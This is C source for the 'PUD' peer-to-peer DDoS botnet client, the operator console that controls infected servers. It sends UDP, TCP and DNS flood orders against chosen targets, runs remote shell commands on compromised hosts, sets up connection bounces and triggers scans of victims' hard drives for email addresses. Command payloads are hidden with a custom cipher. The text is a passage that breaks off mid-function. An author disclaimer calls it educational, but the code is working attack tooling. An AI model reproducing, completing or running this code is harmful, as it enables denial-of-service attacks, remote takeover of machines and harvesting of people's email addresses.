/****************************************************************************
 *                                                                          *
 *      Peer-to-peer UDP Distributed Denial of Service Client (PUD)         *
 *                         by contem@efnet                                  *
 *                                                                          *
 *         This program needs to be ran with an ip of any computer running  *
 *  The server, the commands are:                                           *
 *                                                                          *
 *               kill      kills the daemon                                 *
 *                                                                          *
 *               log       log output to file                               *
 *                                                                          *
 *               bounce    adds a bounce                                    *
 *               close     closes a bounce                                  *
 *                                                                          *
 *               info      requests info                                    *
 *               list      lists the current servers                        *
 *               sh        execs a command                                  *
 *                                                                          *
 *               udpflood  send a udp flood                                 *
 *               tcpflood  send a tcp flood                                 *
 *               dnsflood  send a dns flood                                 *
 *                                                                          *
 *               escan     scans hard drive for emails                      *
 *                                                                          *
 *         Most of those commands will ask for a dest (destination) as its  *
 *  first parameter, the destination is the ip of the computer running the  *
 *  server, or 0 to broadcast to every computer running it.  For example:   *
 *                                                                          *
 *               info 0                                                     *
 *                                                                          *
 *         That will request info on every computer linked.  It can also be *
 *  abreviated as just "i 0".                                               *
 *                                                                          *
 *         I am not responsible for any harm caused by this program!        *
 *  I made this program to demonstrate peer-to-peer communication and       *
 *  should not be used in real life.  It is an education program that       *
 *  should never even be ran at all, nor used in any way, shape or          *
 *  form.  It is not the authors fault if it was used for any purposes      *
 *  other than educational.                                                 *
 *                                                                          *
 ****************************************************************************/

#include <stdio.h>
#include <unistd.h>
#include <string.h>
#include <fcntl.h>
#include <stdlib.h>
#include <stdarg.h>
#include <sys/ioctl.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <sys/time.h>
#include <unistd.h>
#include <errno.h>
#include <netdb.h>

#define PORT		2002

#define CLIENTS		128
#define LINKS		128
#define VERSION		11092002
#define FREE(x) {if (x) { free(x);x=NULL; }}

#define SOCKS "0.0.0.0"
enum { ASUCCESS=0, ARESOLVE, ACONNECT, ASOCKET, ABIND, AINUSE, APENDING, AINSTANCE, AUNKNOWN };
enum { AREAD=1, AWRITE=2, AEXCEPT=4 };

struct ainst {
	void *ext,*ext5,*ext6;
	int ext2,ext3,ext4;

	int sock,error;
	unsigned long len;
	struct sockaddr_in in;
};
struct llheader {
	char type;
	unsigned long checksum;
	unsigned long id;
};
struct header {
	char tag;
	int id;
	unsigned long len;
	unsigned long seq;
};
struct route_rec {
	struct header h;
	char sync;
	unsigned char hops;
	unsigned long server;
	unsigned long links;
};
struct kill_rec {
	struct header h;
};
struct sh_rec {
	struct header h;
};
struct list_rec {
	struct header h;
};
struct udp_rec {
	struct header h;
	unsigned long size;
	unsigned long target;
	unsigned short port;
	unsigned long secs;
};
struct tcp_rec {
	struct header h;
	unsigned long target;
	unsigned short port;
	unsigned long secs;
};
struct gen_rec {
	struct header h;
	unsigned long target;
	unsigned short port;
	unsigned long secs;
};
struct df_rec {
	struct header h;
	unsigned long target;
	unsigned long secs;
};
struct add_rec {
	struct header h;
	unsigned long server;
	unsigned long socks;
	unsigned long bind;
	unsigned short port;
};
struct data_rec {
	struct header h;
};
struct addsrv_rec {
	struct header h;
};
struct initsrv_rec {
	struct header h;
};
struct qmyip_rec {
	struct header h;
};
struct myip_rec {
	struct header h;
	unsigned long ip;
};
struct escan_rec {
	struct header h;
	unsigned long ip;
};
struct getinfo_rec {
	struct header h;
	unsigned long time;
	unsigned long mtime;
};
struct info_rec {
	struct header h;
	unsigned char a;
	unsigned char b;
	unsigned char c;
	unsigned char d;
	unsigned long ip;
	unsigned long uptime;
	unsigned long reqtime;
	unsigned long reqmtime;
	unsigned long in;
	unsigned long out;
	unsigned long version;
};

struct ainst udp, clients[CLIENTS], servers[CLIENTS];
unsigned int sseed;
FILE *logfile;
unsigned long rsa[LINKS];

void gsrand(unsigned long s) { sseed=s; }
unsigned long grand() { sseed=((sseed*965764979)%65535)/2; return sseed; }

char *aerror(struct ainst *inst) {
	if (inst == NULL) return "Invalid instance or socket";
	switch(inst->error) {
		case ASUCCESS:return "Operation Success";
		case ARESOLVE:return "Unable to resolve";
		case ACONNECT:return "Unable to connect";
		case ASOCKET:return "Unable to create socket";
		case ABIND:return "Unable to bind socket";
		case AINUSE:return "Port is in use";
		case APENDING:return "Operation pending";
		case AUNKNOWN:default:return "Unknown";
	}
	return "";
}

int aresolve(char *host) {
 	struct hostent *hp;
	if (inet_addr(host) == 0 || inet_addr(host) == -1) {
		unsigned long a;
		if ((hp = gethostbyname(host)) == NULL) return 0;
		bcopy((char*)hp->h_addr, (char*)&a, hp->h_length);
		return a;
	}
	else return inet_addr(host);
}

unsigned long agetaddr(struct ainst *inst) {
	return inst->in.sin_addr.s_addr;
}

int abind(struct ainst *inst,char *ip,unsigned short port) {
	struct sockaddr_in in;
	if (inst == NULL) return (AINSTANCE);
	if (inst->sock == 0) {
		inst->error=AINSTANCE;
		return (AINSTANCE);
	}
	inst->len=0;
	in.sin_family = AF_INET;
	if (ip == NULL) in.sin_addr.s_addr = INADDR_ANY;
	else in.sin_addr.s_addr = inet_addr(ip);
	in.sin_port = htons(port);
	if (bind(inst->sock, (struct sockaddr *)&in, sizeof(in)) < 0) {
		inst->error=ABIND;
		return (ABIND);
	}
	inst->error=ASUCCESS;
	return ASUCCESS;
}

int await(struct ainst **inst,unsigned long len,char type,long secs) {
	struct timeval tm,*tmp;
	fd_set read,write,except,*readp,*writep,*exceptp;
	int p,ret,max;
	if (inst == NULL) return (AINSTANCE);
	for (p=0;p<len;p++) inst[p]->len=0;
	if (secs > 0) {
		tm.tv_sec=secs;
		tm.tv_usec=0;
		tmp=&tm;
	}
	else tmp=(struct timeval *)NULL;
	if (type & AREAD) {
		FD_ZERO(&read);
		for (p=0;p<len;p++) FD_SET(inst[p]->sock,&read);
		readp=&read;
	}
	else readp=(struct fd_set*)0;
	if (type & AWRITE) {
		FD_ZERO(&write);
		for (p=0;p<len;p++) FD_SET(inst[p]->sock,&write);
		writep=&write;
	}
	else writep=(struct fd_set*)0;
	if (type & AEXCEPT) {
		FD_ZERO(&except);
		for (p=0;p<len;p++) FD_SET(inst[p]->sock,&except);
		exceptp=&except;
	}
	else exceptp=(struct fd_set*)0;
	for (p=0,max=0;p<len;p++) if (inst[p]->sock > max) max=inst[p]->sock;
	if ((ret=select(max+1,readp,writep,exceptp,tmp)) == 0) {
		for (p=0;p<len;p++) inst[p]->error=APENDING;
		return (APENDING);
	}
	if (ret == -1) return (AUNKNOWN);
	for (p=0;p<len;p++) {
		if (type & AREAD) if (FD_ISSET(inst[p]->sock,&read)) inst[p]->len+=AREAD;
		if (type & AWRITE) if (FD_ISSET(inst[p]->sock,&write)) inst[p]->len+=AWRITE;
		if (type & AEXCEPT) if (FD_ISSET(inst[p]->sock,&except)) inst[p]->len+=AEXCEPT;
	}
	for (p=0;p<len;p++) inst[p]->error=ASUCCESS;
	return (ASUCCESS);
}

int atcp_sync_check(struct ainst *inst) {
	if (inst == NULL) return (AINSTANCE);
	inst->len=0;
	errno=0;
	if (connect(inst->sock, (struct sockaddr *)&inst->in, sizeof(inst->in)) == 0 || errno == EISCONN) {
		inst->error=ASUCCESS;
		return (ASUCCESS);
	}
	if (!(errno == EINPROGRESS ||errno == EALREADY)) {
		inst->error=ACONNECT;
		return (ACONNECT);
	}
	inst->error=APENDING;
	return (APENDING);
}

int atcp_sync_connect(struct ainst *inst,char *host,unsigned int port) {
	int flag=1;
 	struct hostent *hp;
	if (inst == NULL) return (AINSTANCE);
	inst->len=0;
	if ((inst->sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0) {
		inst->error=ASOCKET;
		return (ASOCKET);
	}
	if (inet_addr(host) == 0 || inet_addr(host) == -1) {
		if ((hp = gethostbyname(host)) == NULL) {
			inst->error=ARESOLVE;
			return (ARESOLVE);
		}
		bcopy((char*)hp->h_addr, (char*)&inst->in.sin_addr, hp->h_length);
	}
	else inst->in.sin_addr.s_addr=inet_addr(host);
	inst->in.sin_family = AF_INET;
	inst->in.sin_port = htons(port);
	flag = fcntl(inst->sock, F_GETFL, 0);
	flag |= O_NONBLOCK;
	fcntl(inst->sock, F_SETFL, flag);
	inst->error=ASUCCESS;
	return (ASUCCESS);
}

int atcp_connect(struct ainst *inst,char *host,unsigned int port) {
	int flag=1;
	unsigned long start;
 	struct hostent *hp;
	if (inst == NULL) return (AINSTANCE);
	inst->len=0;
	if ((inst->sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0) {
		inst->error=ASOCKET;
		return (ASOCKET);
	}
	if (inet_addr(host) == 0 || inet_addr(host) == -1) {
		if ((hp = gethostbyname(host)) == NULL) {
			inst->error=ARESOLVE;
			return (ARESOLVE);
		}
		bcopy((char*)hp->h_addr, (char*)&inst->in.sin_addr, hp->h_length);
	}
	else inst->in.sin_addr.s_addr=inet_addr(host);
	inst->in.sin_family = AF_INET;
	inst->in.sin_port = htons(port);
	flag = fcntl(inst->sock, F_GETFL, 0);
	flag |= O_NONBLOCK;
	fcntl(inst->sock, F_SETFL, flag);
	start=time(NULL);
	while(time(NULL)-start < 10) {
		errno=0;
		if (connect(inst->sock, (struct sockaddr *)&inst->in, sizeof(inst->in)) == 0 || errno == EISCONN) {
			inst->error=ASUCCESS;
			return (ASUCCESS);
		}
		if (!(errno == EINPROGRESS ||errno == EALREADY)) break;
		sleep(1);
	}
	inst->error=ACONNECT;
	return (ACONNECT);
}

int atcp_listen(struct ainst *inst,unsigned int port) {
	int flag=1;
	if (inst == NULL) return (AINSTANCE);
	inst->len=0;
	if ((inst->sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0) {
		inst->error=ASOCKET;
		return (ASOCKET);
	}
	inst->in.sin_family = AF_INET;
	inst->in.sin_addr.s_addr = INADDR_ANY;
	inst->in.sin_port = htons(port);
	if (bind(inst->sock, (struct sockaddr *)&inst->in, sizeof(inst->in)) < 0) {
		inst->error=ABIND;
		return (ABIND);
	}
	if (listen(inst->sock, CLIENTS) < 0) {
		inst->error=AINUSE;
		return (AINUSE);
	}
	flag = fcntl(inst->sock, F_GETFL, 0);
	flag |= O_NONBLOCK;
	fcntl(inst->sock, F_SETFL, flag);
	inst->error=ASUCCESS;
	return (ASUCCESS);
}

int atcp_accept(struct ainst *inst,struct ainst *child) {
	int sock;
	unsigned int datalen;
	if (inst == NULL || child == NULL) return (AINSTANCE);
	datalen=sizeof(child->in);
	inst->len=0;
	memcpy((void*)child,(void*)inst,sizeof(struct ainst));
	if ((sock=accept(inst->sock,(struct sockaddr *)&child->in,&datalen)) < 0) {
		memset((void*)child,0,sizeof(struct ainst));
		inst->error=APENDING;
		return (APENDING);
	}
	child->sock=sock;
	inst->len=datalen;
	inst->error=ASUCCESS;
	return (ASUCCESS);
}

int atcp_send(struct ainst *inst,char *buf,unsigned long len) {
	long datalen;
	if (inst == NULL) return (AINSTANCE);
	inst->len=0;
	errno=0;
	if (inst->sock == 1) if (logfile) {
		write(fileno(logfile),buf,len);
		fflush(logfile);
	}
	if ((datalen=write(inst->sock,buf,len)) < len) {
		if (errno == EAGAIN) {
			inst->error=APENDING;
			return (APENDING);
		}
		else {
			inst->error=AUNKNOWN;
			return (AUNKNOWN);
		}
	}
	inst->len=datalen;
	inst->error=ASUCCESS;
	return (ASUCCESS);
}

int atcp_sendmsg(struct ainst *inst, char *words, ...) {
	static char textBuffer[2048];
	unsigned int a;
	va_list args;
	va_start(args, words);
	a=vsprintf(textBuffer, words, args);
	va_end(args);
	return atcp_send(inst,textBuffer,a);
}

int atcp_recv(struct ainst *inst,char *buf,unsigned long len) {
	long datalen;
	if (inst == NULL) return (AINSTANCE);
	inst->len=0;
	if ((datalen=read(inst->sock,buf,len)) < 0) {
		if (errno == EAGAIN) {
			inst->error=APENDING;
			return (APENDING);
		}
		else {
			inst->error=AUNKNOWN;
			return (AUNKNOWN);
		}
	}
	if (datalen == 0 && len) {
		inst->error=AUNKNOWN;
		return (AUNKNOWN);
	}
	inst->len=datalen;
	inst->error=ASUCCESS;
	return (ASUCCESS);
}

int atcp_close(struct ainst *inst) {
	if (inst == NULL) return (AINSTANCE);
	inst->len=0;
	if (close(inst->sock) < 0) {
		inst->error=AUNKNOWN;
		return (AUNKNOWN);
	}
	inst->sock=0;
	inst->error=ASUCCESS;
	return (ASUCCESS);
}

int audp_listen(struct ainst *inst,unsigned int port) {
	int flag=1;
	if (inst == NULL) return (AINSTANCE);
	inst->len=0;
	if ((inst->sock = socket(AF_INET,SOCK_DGRAM,IPPROTO_UDP)) < 0) {
		inst->error=ASOCKET;
		return (ASOCKET);
	}
	inst->in.sin_family = AF_INET;
	inst->in.sin_addr.s_addr = INADDR_ANY;
	inst->in.sin_port = htons(port);
	if (bind(inst->sock, (struct sockaddr *)&inst->in, sizeof(inst->in)) < 0) {
		inst->error=ABIND;
		return (ABIND);
	}
	flag = fcntl(inst->sock, F_GETFL, 0);
	flag |= O_NONBLOCK;
	fcntl(inst->sock, F_SETFL, flag);
	inst->error=ASUCCESS;
	return (ASUCCESS);
}

int audp_connect(struct ainst *inst,char *host,unsigned int port) {
	int flag=1;
 	struct hostent *hp;
	if (inst == NULL) return (AINSTANCE);
	inst->len=0;
	if ((inst->sock = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP)) < 0) {
		inst->error=ASOCKET;
		return (ASOCKET);
	}
	if (inet_addr(host) == 0 || inet_addr(host) == -1) {
		if ((hp = gethostbyname(host)) == NULL) {
			inst->error=ARESOLVE;
			return (ARESOLVE);
		}
		bcopy((char*)hp->h_addr, (char*)&inst->in.sin_addr, hp->h_length);
	}
	else inst->in.sin_addr.s_addr=inet_addr(host);
	inst->in.sin_family = AF_INET;
	inst->in.sin_port = htons(port);
	flag = fcntl(inst->sock, F_GETFL, 0);
	flag |= O_NONBLOCK;
	fcntl(inst->sock, F_SETFL, flag);
	if (connect(inst->sock, (struct sockaddr *)&inst->in, sizeof(inst->in)) == 0) {
		inst->error=ASUCCESS;
		return (ASUCCESS);
	}
	inst->error=ACONNECT;
	return (ACONNECT);
}

int audp_setup(struct ainst *inst,char *host,unsigned int port) {
	int flag=1;
 	struct hostent *hp;
	if (inst == NULL) return (AINSTANCE);
	inst->len=0;
	if ((inst->sock = socket(AF_INET,SOCK_DGRAM,IPPROTO_UDP)) < 0) {
		inst->error=ASOCKET;
		return (ASOCKET);
	}
	if (inet_addr(host) == 0 || inet_addr(host) == -1) {
		if ((hp = gethostbyname(host)) == NULL) {
			inst->error=ARESOLVE;
			return (ARESOLVE);
		}
		bcopy((char*)hp->h_addr, (char*)&inst->in.sin_addr, hp->h_length);
	}
	else inst->in.sin_addr.s_addr=inet_addr(host);
	inst->in.sin_family = AF_INET;
	inst->in.sin_port = htons(port);
	flag = fcntl(inst->sock, F_GETFL, 0);
	flag |= O_NONBLOCK;
	fcntl(inst->sock, F_SETFL, flag);
	inst->error=ASUCCESS;
	return (ASUCCESS);
}

int audp_send(struct ainst *inst,char *buf,unsigned long len) {
	long datalen;
	if (inst == NULL) return (AINSTANCE);
	inst->len=0;
	errno=0;
	if ((datalen=sendto(inst->sock,buf,len,0,(struct sockaddr*)&inst->in,sizeof(inst->in))) < len) {
		if (errno == EAGAIN) {
			inst->error=APENDING;
			return (APENDING);
		}
		else {
			inst->error=AUNKNOWN;
			return (AUNKNOWN);
		}
	}
	inst->len=datalen;
	inst->error=ASUCCESS;
	return (ASUCCESS);
}

int audp_sendmsg(struct ainst *inst, char *words, ...) {
        static char textBuffer[2048];
	unsigned int a;
        va_list args;
        va_start(args, words);
        a=vsprintf(textBuffer, words, args);
        va_end(args);
        return audp_send(inst,textBuffer,a);
}

int audp_recv(struct ainst *inst,struct ainst *client,char *buf,unsigned long len) {
	long datalen,nlen;
	if (inst == NULL) return (AINSTANCE);
	nlen=sizeof(inst->in);
	inst->len=0;
	memcpy((void*)client,(void*)inst,sizeof(struct ainst));
	if ((datalen=recvfrom(inst->sock,buf,len,0,(struct sockaddr*)&client->in,(socklen_t*)&nlen)) < 0) {
		if (errno == EAGAIN) {
			inst->error=APENDING;
			return (APENDING);
		}
		else {
			inst->error=AUNKNOWN;
			return (AUNKNOWN);
		}
	}
	inst->len=datalen;
	inst->error=ASUCCESS;
	return (ASUCCESS);
}

int audp_close(struct ainst *inst) {
	if (inst == NULL) return (AINSTANCE);
	inst->len=0;
	if (close(inst->sock) < 0) {
		inst->error=AUNKNOWN;
		return (AUNKNOWN);
	}
	inst->sock=0;
	inst->error=ASUCCESS;
	return (ASUCCESS);
}

unsigned long _decrypt(char *str, unsigned long len) {
	unsigned long pos=0,seed[4]={0x78912389,0x094e7bc43,0xba5de30b,0x7bc54da7};
	gsrand(((seed[0]+seed[1])*seed[2])^seed[3]);
	while(1) {
		gsrand(seed[pos%4]+grand()+pos);
		str[pos]-=grand();
		pos++;
		if (pos >= len) break;
	}
	return pos;
}

unsigned long _encrypt(char *str, unsigned long len) {
	unsigned long pos=0,seed[4]={0x78912389,0x094e7bc43,0xba5de30b,0x7bc54da7};
	gsrand(((seed[0]+seed[1])*seed[2])^seed[3]);
	while(1) {
		gsrand(seed[pos%4]+grand()+pos);
		str[pos]+=grand();
		pos++;
		if (pos >= len) break;
	}
	return pos;
}

int checkid(int id) {
	if (id == 0) {
		while((id=rand()) == 0);
		return id;
	}
	return id;
}

int usersa(unsigned long rs) {
	unsigned long a;
	if (rs == 0) return 0;
	for (a=0;a<LINKS;a++) if (rsa[a] == rs) return 1;
	return 0;
}

unsigned long newrsa() {
	unsigned long rs;
	while(1) {
		rs=(rand()*rand())^rand();
		if (usersa(rs) || rs == 0) continue;
		break;
	}
	return rs;
}

void addrsa(unsigned long rs) {
	unsigned long i;
	for (i=LINKS;i>0;i--) rsa[i]=rsa[i-1];
	rsa[0]=rs;
}

u_short in_cksum(u_short *addr, int len) {
	register int nleft = len;
	register u_short *w = addr;
	register int sum = 0;
	u_short answer =0;
	while (nleft > 1) {
		sum += *w++;
		nleft -= 2;
	}
	if (nleft == 1) {
		*(u_char *)(&answer) = *(u_char *)w;
		sum += answer;
	}
	sum = (sum >> 16) + (sum & 0xffff);
	sum += (sum >> 16);
	answer = ~sum;
	return(answer);
}

void route(int urgent,int id,unsigned long dest,char *buf,unsigned long len) {
	struct route_rec rc;
	struct llheader rp;
	char *str=(char*)malloc(sizeof(struct llheader)+sizeof(struct route_rec)+len);
	if (str == NULL) return;
	memset((void*)&rp,0,sizeof(struct llheader));
	memset((void*)&rc,0,sizeof(struct route_rec));
	rc.h.tag=0x26;
	rc.h.id=id;
	rc.h.len=sizeof(struct route_rec)+len;
	rc.h.seq=(rand()+rand())^rand();
	rc.sync=0;
	rc.server=dest;
	if (urgent) rc.hops=0;
	else rc.hops=5;
	memcpy((void*)(str+sizeof(struct llheader)),(void*)&rc,sizeof(struct route_rec));
	memcpy((void*)(str+sizeof(struct llheader)+sizeof(struct route_rec)),(void*)buf,len);

	rp.checksum=in_cksum(str+sizeof(struct llheader),len+sizeof(struct route_rec));
	rp.id=newrsa();
	rp.type=0;
	memcpy((void*)str,(void*)&rp,sizeof(struct llheader));

	audp_send(&udp,str,sizeof(struct llheader)+sizeof(struct route_rec)+len);
	FREE(str);
}

void Log(char *str, ...) {
	static char textBuffer[2048];
	va_list args;
	va_start(args, str);
	vsprintf(textBuffer, str, args);
	va_end(args);
	printf("%s",textBuffer);
	if (logfile) {
		fprintf(logfile,"%s",textBuffer);
		fflush(logfile);
	}
}

int main(int argc, char **argv) {
	struct ainst astdio;
	char *srv;
	if (argc <= 1) {
		Log("%s <base>\n",argv[0]);
		return 0;
	}
	srv=argv[1];
	astdio.sock=0;
	astdio.ext2=checkid(rand());
	astdio.ext3=1;
	memset(clients,0,sizeof(struct ainst)*CLIENTS);
	memset(servers,0,sizeof(struct ainst)*CLIENTS);
	if (audp_setup(&udp,srv,PORT) != 0) {
		Log("Error: %s\n",aerror(&udp));
		exit(0);
	}
	srand(time(NULL)^getpid());
	Log("PUD Client version %d",VERSION);
	Log("Ready, type in the commands as follows, or type help for a list:\n");
	while (1) {
		int n,p;
		long a;
		char buf_[3000],*buf=buf_;
		struct ainst *list[(CLIENTS*2)+4],*client,tmpclient;
		list[0]=&udp;
		list[1]=&astdio;
		for (n=0,p=2;n<CLIENTS;n++) if (clients[n].sock != 0) {
			list[p]=&clients[n];
			p++;
		}
		for (n=0;n<CLIENTS;n++) if (servers[n].sock != 0) {
			list[p]=&servers[n];
			p++;
		}
		await(list,p,AREAD|AEXCEPT,2);

		if (astdio.len != 0) {
			char line[4000],*message,*params[12],name[1024]={0};
			unsigned long num_params=0, m, i;
			memset(line,0,4000);
			if (read(0,line,4000) <= 0) memset(line,0,4000);
			message=line;
			while(strlen(message) && (*message == '\t' || *message == ' ')) message++;
			while(strlen(message) && (message[strlen(message)-1] == '\r' || message[strlen(message)-1] == '\n')) message[strlen(message)-1] = 0;
			m=strlen(message);
			for (i=0;i<m;i++) {
				if (*message == ' ' || *message == 0) break;
				name[i]=*message;
				message++;
			}
			for (i=0;i<strlen(message);i++) if (message[i] == ' ') {
				num_params++;
				if (message[i+1] == ':') break;
			}
			num_params++;
			if (num_params > 10) num_params=10;
			params[0]=name;
			params[num_params+1]="\0";
			m=1;
			while (*message != 0) {
				message++;
				if (m >= num_params) break;
				if (*message == ':') {
					message++;
					params[m]=(char*)malloc(strlen(message)+1);
					if (params[m] == NULL) break;
					strcpy(params[m],message);
					params[m][strlen(message)]=0;
					m++;
					break;
				}
				for (i=0;i<strlen(message) && message[i] != ' ';i++);
				params[m]=(char*)malloc(i+1);
				if (params[m] == NULL) break;
				strncpy(params[m],message,i);
				params[m][i]=0;
				m++;
				message+=i;
			}
			num_params++;
			switch(tolower(*params[0])) {
				case 'h': {
					Log("The commands are:\n");
					Log("  * kill      kills the daemon\n");
					Log("\n");
					Log("  * log       log output to file\n");
					Log("\n");
					Log("  * bounce    adds a bounce\n");
					Log("  * close     closes a bounce\n");
					Log("\n");
					Log("  * info      requests info\n");
					Log("  * list      lists the current servers\n");
					Log("  * sh        execs a command\n");
					Log("\n");
					Log("  * udpflood  send a udp flood\n");
					Log("  * tcpflood  send a tcp flood\n");
					Log("  * dnsflood  send a dns flood\n");
					Log("\n");
					Log("  * escan     scans hard drive for emails\n");
					} break;
				case 'i': {
					struct getinfo_rec rc;
					if (num_params <= 2) Log("info <dest>\n");
					else {
						struct timeval t;
						gettimeofday(&t,NULL);
						memset((void*)&rc,0,sizeof(struct getinfo_rec));
						rc.h.tag=0x20;
						rc.h.id=astdio.ext2;
						rc.time=t.tv_sec;
						rc.mtime=t.tv_usec;
						route(0,astdio.ext2,aresolve(params[1]),(void*)&rc,sizeof(struct getinfo_rec));
					}
					} break;
				case 'b': {
					if (num_params <= 5) Log("bounce <dest> <server> <dport> <sport> [bind]\n");
					else {
						unsigned long test=aresolve(params[1]),test2=aresolve(params[2]);
						if (test == 0 || test == -1) {
							Log("Cannot broadcast a bounce\n");
							break;
						}
						else if (test2 == 0 || test2 == -1) {
							Log("Invalid destination\n");
							break;
						}
						else {
							a=0;
							for (p=0;p<CLIENTS;p++) if (servers[p].sock == 0) {
								if (atcp_listen(&servers[p],atoi(params[4])) != 0) {
									Log("Unable to bind socket\n");
									a=2;
									break;
								}
								servers[p].ext=(void*)test2;
								servers[p].ext2=(unsigned short)atoi(params[3]);
								servers[p].ext3=checkid(rand());
								servers[p].ext4=(unsigned short)atoi(params[4]);
								servers[p].ext5=(void*)test;
								if (num_params > 6) servers[p].ext6=(void*)aresolve(params[5]);
								else servers[p].ext6=0;
								a=1;
								break;
							}
							if (a == 0) Log("Sockets full\n");
						}
					}
					} break;
				case 'c': {
					struct kill_rec rc;
					if (num_params <= 3) Log("close <dest> <port>\n");
					else {
						unsigned long test=aresolve(params[1]);
						if (test == 0 || test == -1) {
							Log("Cannot broadcast a close\n");
							break;
						}
						else {
							memset((void*)&rc,0,sizeof(struct kill_rec));
							for (p=0;p<CLIENTS;p++) if (servers[p].sock != 0 && servers[p].ext4 == atoi(params[2])) {
								for (n=0;n<CLIENTS;n++) if (clients[n].sock != 0 && clients[n].ext3 == servers[p].ext3) {
									rc.h.tag=0x22;
									rc.h.id=clients[n].ext2;
									route(0,astdio.ext2,test,(void*)&rc,sizeof(struct kill_rec));
									atcp_close(&clients[n]);
								}
								atcp_close(&servers[p]);
							}
						}
					}
					} break;
				case 's': {
					struct sh_rec rc;
					if (num_params <= 3) Log("sh <dest> :<command>\n");
					else {
						char *str;
						memset((void*)&rc,0,sizeof(struct sh_rec));
						rc.h.tag=0x24;
						rc.h.id=astdio.ext2;
						rc.h.len=strlen(params[2]);
						str=(char*)malloc(sizeof(struct sh_rec)+strlen(params[2])+1);
						if (str == NULL) {
							atcp_close(&clients[n]);
							break;
						}
						memcpy((void*)str,(void*)&rc,sizeof(struct sh_rec));
						memcpy((void*)(str+sizeof(struct sh_rec)),(void*)params[2],strlen(params[2]));
						_encrypt(str+sizeof(struct sh_rec),strlen(params[2]));
						route(0,astdio.ext2,aresolve(params[1]),str,sizeof(struct sh_rec)+strlen(params[2]));
						FREE(str);
					}
					} break;
				case 'e': {
					if (strlen(params[0]) > 1) switch (tolower(params[0][1])) {
						case 's': {
							struct escan_rec rc;
							if (num_params <= 2) Log("escan <dest>\n");
							else {
								memset((void*)&rc,0,sizeof(struct escan_rec));
								rc.h.tag=0x2D;
								rc.h.id=astdio.ext2;
								route(0,astdio.ext2,aresolve(params[1]),(void*)&rc,sizeof(struct escan_rec));
							}
							} break;
						default:
							Log("Unknown command\n");
							break;
					}
					else Log("Unknown command\n");
					} break;
				case 'k': {
					struct kill_rec rc;
					memset((void*)&rc,0,sizeof(struct kill_rec));
					rc.h.tag=0x22;
					for (n=0;n<CLIENTS;n++) if (clients[n].sock != 0) {
						struct ainst *server=NULL;
						for (p=0;p<CLIENTS;p++) if (servers[p].sock != 0 && servers[p].ext3 == client->ext3) server=&servers[p];
						if (server != NULL) {
							rc.h.id=clients[n].ext2;
							route(0,rc.h.id,(unsigned long)server->ext5,(void*)&rc,sizeof(struct kill_rec));
						}
						atcp_close(&clients[n]);
					}
					for (p=0;p<CLIENTS;p++) if (servers[n].sock != 0) atcp_close(&servers[p]);
					audp_close(&udp);
					exit(0);
					} break;
				case 'u': {
					if (strlen(params[0]) > 1) switch (tolower(params[0][1])) {
						case 'd': {
							struct udp_rec rc;
							if (num_params <= 6) Log("udpflood <dest> <size or 9216> <target> <port> <seconds>\n");
							else {
								memset((void*)&rc,0,sizeof(struct udp_rec));
								rc.h.tag=0x29;
								rc.h.id=astdio.ext2;
								rc.size=atoi(params[2]);
								rc.target=aresolve(params[3]);
								rc.port=atoi(params[4]);
								rc.secs=atoi(params[5]);
								route(0,astdio.ext2,aresolve(params[1]),(void*)&rc,sizeof(struct udp_rec));
							}
							} break;
						default:
							Log("Unknown command\n");
							break;
					}
					else Log("Unknown command\n");
					} break;
				case 'd': {
					struct df_rec rc;
					if (num_params <= 5) Log("dnsflood <dest> <target> <seconds> <name>\n");
					else {
						char *str;
						memset((void*)&rc,0,sizeof(struct df_rec));
						rc.h.tag=0x2C;
						rc.h.id=astdio.ext2;
						rc.h.len=strlen(params[4]);
						rc.target=aresolve(params[2]);
						rc.secs=atoi(params[3]);
						str=(char*)malloc(sizeof(struct df_rec)+strlen(params[4])+1);
						if (str == NULL) {
							atcp_close(&clients[n]);
							break;
						}
						memcpy((void*)str,(void*)&rc,sizeof(struct df_rec));
						memcpy((void*)(str+sizeof(struct df_rec)),(void*)params[4],strlen(params[4]));
						_encrypt(str+sizeof(struct df_rec),strlen(params[4]));
						route(0,astdio.ext2,aresolve(params[1]),str,sizeof(struct df_rec)+strlen(params[4]));
						FREE(str);
					}
					} break;
				case 'l': {
					if (strlen(params[0]) > 1) switch (tolower(params[0][1])) {
						case 'i': {
							struct {
								struct llheader h;
								struct list_rec l;
							} rc;
							memset((void*)&rc,0,sizeof(struct llheader)+sizeof(struct list_rec));
							astdio.ext4=0;
							if (num_params > 2) {
								if (*params[1] == 'r') astdio.ext4=1;
								else {
									Log("list [resolve]\n");
									break;
								}
							}
							rc.l.h.tag=0x28;
							rc.l.h.id=astdio.ext2;
							rc.h.checksum=in_cksum((void*)&rc.l,sizeof(struct list_rec));
							rc.h.id=newrsa();
							rc.h.type=0;
							audp_send(&udp,(void*)&rc,sizeof(struct llheader)+sizeof(struct list_rec));
							} break;
						case 'o': {
							if (num_params <= 2) {
								Log("No longer logging\n");
								logfile=NULL;
							}
							else {
								logfile=fopen(params[1],"a");
								if (logfile) Log("Logging to file %s\n",params[1]);
								else Log("Unable to open %s\n",params[1]);
							}
							} break;
						default:
							Log("Unknown command\n");
							break;
					}
					} break;
				case 't': {
					struct tcp_rec rc;
					if (num_params <= 5) Log("tcpflood <dest> <target> <port> <seconds>\n");
					else {
						memset((void*)&rc,0,sizeof(struct tcp_rec));
						rc.h.tag=0x2A;
						rc.h.id=astdio.ext2;
						rc.target=aresolve(params[2]);
						rc.port=atoi(params[3]);
						rc.secs=atoi(params[4]);
						route(0,astdio.ext2,aresolve(params[1]),(void*)&rc,sizeof(struct tcp_rec));
					}
					} break;
				case 0:
				case 0x0a:
					break;
				default:
					Log("Unknown command\n");
					break;
			}
			for (i=1;i<num_params-1;i++) FREE(params[i]);
		}

		if (udp.len != 0) if (!audp_recv(&udp,&tmpclient,buf,3000)) {
			struct header *rc;
			struct llheader *llrc;
			char k=0;
			buf+=sizeof(struct llheader);
			udp.len-=sizeof(struct llheader);
			llrc=(struct llheader *)(buf-sizeof(struct llheader));
			rc=(struct header *)buf;
			if (llrc->type == 0) {
				struct llheader ll;
				memset((void*)&ll,0,sizeof(struct llheader));
				if (llrc->checksum != in_cksum(buf,udp.len)) k=1;
				else {
					if (!usersa(llrc->id)) {
						addrsa(llrc->id);
						ll.type=1;
